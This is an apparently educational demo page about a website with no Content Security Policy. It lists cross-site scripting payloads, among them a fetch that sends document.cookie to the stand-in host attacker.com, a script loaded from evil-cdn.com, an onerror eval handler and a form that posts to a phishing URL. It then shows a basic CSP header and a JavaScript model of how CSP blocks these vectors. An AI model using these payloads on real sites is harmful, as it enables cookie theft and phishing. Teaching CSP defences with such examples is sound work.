🚨 No CSP Protection - Vulnerable Website

This page has NO Content Security Policy - Everything is allowed!

⚠️ Security Risk: This page has no CSP protection!
Any script from any source can execute. This demonstrates why CSP is crucial.

🔍 Current Security Status

Content Security Policy: NONE

Inline Scripts: ✅ Allowed (Dangerous)

External Scripts: ✅ Allowed from ANY domain (Very Dangerous)

eval() Function: ✅ Allowed (Extremely Dangerous)

Inline Styles: ✅ Allowed

💀 Attack Demonstrations (All Will Work!)

1. Inline Script Injection

Try entering malicious scripts in this input:

Output will appear here...

2. External Script Loading

Load external scripts from any domain:

No external scripts loaded yet...

3. eval() Function Usage

Execute dynamic JavaScript code:

4. Inline Event Handlers

Dynamic HTML with event handlers:

">
HTML output will appear here...

🎯 Pre-loaded Attack Examples

These attacks are already active on this page:

Active Inline Script:

<script>
  console.log('🚨 Inline script executed without CSP protection!');
  // This could be malicious code from an attacker
</script>

External Resource Loading:

Loading image from external domain (could be tracking pixel):

External Resource

In a real attack, this could be a malicious domain!

Unprotected Form Submission:

⚔️ Common Attack Vectors That Work Without CSP

<!-- 1. Script injection in user input -->
<script>
  // Steal cookies
  fetch('https://attacker.com/steal?cookies=' + document.cookie);
</script>

<!-- 2. External malicious script -->
<script src="https://evil-cdn.com/malware.js"></script>

<!-- 3. Image with malicious onerror -->
<img src="invalid" onerror="eval('malicious code')">

<!-- 4. Form hijacking -->
<form action="https://attacker.com/phish" method="post">

<!-- 5. Iframe injection -->
<iframe src="javascript:alert('XSS')"></iframe>

🔥 Try These Payloads:

🛡️ How CSP Would Fix These Issues

With a proper Content Security Policy, all these attacks would be blocked:

<!-- Basic CSP Header -->
Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'

<!-- What this blocks: -->
❌ Inline scripts (like the ones above)
❌ External scripts from unauthorized domains
❌ eval() function execution
❌ Inline event handlers (onclick, onerror, etc.)
❌ javascript: URLs in iframes

<!-- What this allows: -->
✅ Scripts from same origin only
✅ Stylesheets from same origin + inline styles
✅ Images, fonts, etc. from same origin
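To make the "blocks / allows" lists above concrete, here is a small added example (not code from this demo site) that models how a browser applies a Content-Security-Policy header to each vector listed on this page: inline scripts, the evil-cdn.com script, eval(), inline event handlers, javascript: URLs in iframes, and inline styles. It parses the header, applies the fetch-directive fallback to default-src, and handles only the 'self', 'unsafe-inline', 'unsafe-eval', '*' and host-source forms; nonces, hashes and 'strict-dynamic' are deliberately left out. The page origin https://example.test is an assumed value for the demonstration.

```javascript
// Added example: a simplified model of CSP source-list evaluation.
// It covers the keywords used on this page only; nonces, hashes and
// 'strict-dynamic' are out of scope, so a real browser may allow more.

// Parse "directive src src; directive src" into a Map of directive -> sources.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

// Fetch directives (script-src, style-src, img-src, frame-src, ...) fall back
// to default-src when absent. With neither present, the resource type is
// unrestricted, which is exactly the "no CSP" state this page demonstrates.
function effectiveSources(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  if (policy.has('default-src')) return policy.get('default-src');
  return null; // unrestricted
}

// Would this source list let the page load `url`, given the page's origin?
function hostAllowed(sources, url, pageOrigin) {
  if (sources === null) return true;
  const target = new URL(url);
  for (const src of sources) {
    if (src === "'self'") {
      if (target.origin === pageOrigin) return true;
    } else if (src === '*') {
      return true;
    } else if (!src.startsWith("'")) {
      // host-source: drop any scheme, support a leading "*." wildcard
      const pattern = src.replace(/^https?:\/\//, '').toLowerCase();
      if (pattern.startsWith('*.')) {
        if (target.hostname.endsWith(pattern.slice(1))) return true;
      } else if (target.hostname === pattern) {
        return true;
      }
    }
  }
  return false;
}

// Keyword sources ('unsafe-inline', 'unsafe-eval') gate inline code and eval().
function keywordAllowed(sources, keyword) {
  return sources === null || sources.includes(keyword);
}

// Evaluate the vectors listed on this page against one header value.
// pageOrigin is an assumed origin for the demonstration.
function evaluatePolicy(header, pageOrigin = 'https://example.test') {
  const policy = parseCsp(header);
  const script = effectiveSources(policy, 'script-src');
  const style = effectiveSources(policy, 'style-src');
  return {
    inlineScript: keywordAllowed(script, "'unsafe-inline'"),
    externalEvilScript: hostAllowed(script, 'https://evil-cdn.com/malware.js', pageOrigin),
    sameOriginScript: hostAllowed(script, pageOrigin + '/app.js', pageOrigin),
    evalCall: keywordAllowed(script, "'unsafe-eval'"),
    // onerror/onclick handlers and javascript: URLs are inline script
    // for CSP purposes, so they follow the same 'unsafe-inline' rule.
    inlineEventHandler: keywordAllowed(script, "'unsafe-inline'"),
    javascriptUrlFrame: keywordAllowed(script, "'unsafe-inline'"),
    inlineStyle: keywordAllowed(style, "'unsafe-inline'"),
  };
}

// The two states contrasted on this page: no header at all, and the
// "Basic CSP Header" shown above.
const NO_CSP = '';
const PAGE_CSP = "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'";

console.log('No CSP:  ', evaluatePolicy(NO_CSP));
console.log('Page CSP:', evaluatePolicy(PAGE_CSP));
```

With the empty header every field comes back true, matching the status list at the top of this page; with the basic header only sameOriginScript and inlineStyle stay true, matching the "allows" list, while the external script, eval(), inline handlers and javascript: frames are refused. Note that a policy with only default-src 'self' also blocks inline styles, since style-src inherits the fallback.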

Next: Check out our CSP-protected examples to see the difference!